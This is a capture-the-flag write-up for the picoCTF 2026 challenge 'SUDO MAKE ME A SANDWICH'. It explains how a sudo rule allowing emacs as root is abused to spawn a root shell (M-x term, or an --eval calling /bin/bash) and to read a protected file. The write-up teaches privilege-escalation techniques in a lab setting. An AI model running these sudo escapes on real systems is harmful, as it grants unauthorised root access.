picoCTF Solutions
picoCTF 2026General SkillsMedium

SUDO MAKE ME A SANDWICH

Published: March 20, 2026

Description

Can you read the flag? I think you can!

Setup

Launch the challenge instance and SSH in.

Check what sudo privileges the current user has.

Solution

  1. Step 1Check sudo permissions
    Run sudo -l to confirm the current user can run emacs as root without a password.
    sudo -l
  2. Step 2Escape to a root shell from emacs
    Launch emacs with sudo and use one of its built-in shell capabilities to get a root shell. GNU Emacs can spawn an interactive terminal via M-x term -- this shell inherits the root privileges of the emacs process.
    sudo emacs
    # Inside emacs:
    # Press Alt+X (M-x), type 'term', press Enter
    # Then at the terminal prompt: cat /home/ctf-player/flag.txt
    # Non-interactive alternative:
    sudo emacs -Q -nw --eval '(term "/bin/bash")'
    # Or direct file read:
    sudo emacs -Q --batch --eval '(with-temp-buffer (insert-file-contents "/home/ctf-player/flag.txt") (message "%s" (buffer-string)))'
  3. Step 3Read the flag
    With root privileges in the spawned shell, read the flag file.
    cat /home/ctf-player/flag.txt
    # or: find / -name flag.txt 2>/dev/null

Flag

picoCTF{g0tt4_l0v3_s4ndw1ch3s_...}

The sudo config allows running emacs as root. Emacs includes a full terminal emulator (M-x term) -- any shell spawned from within it runs as root, giving direct access to the flag file.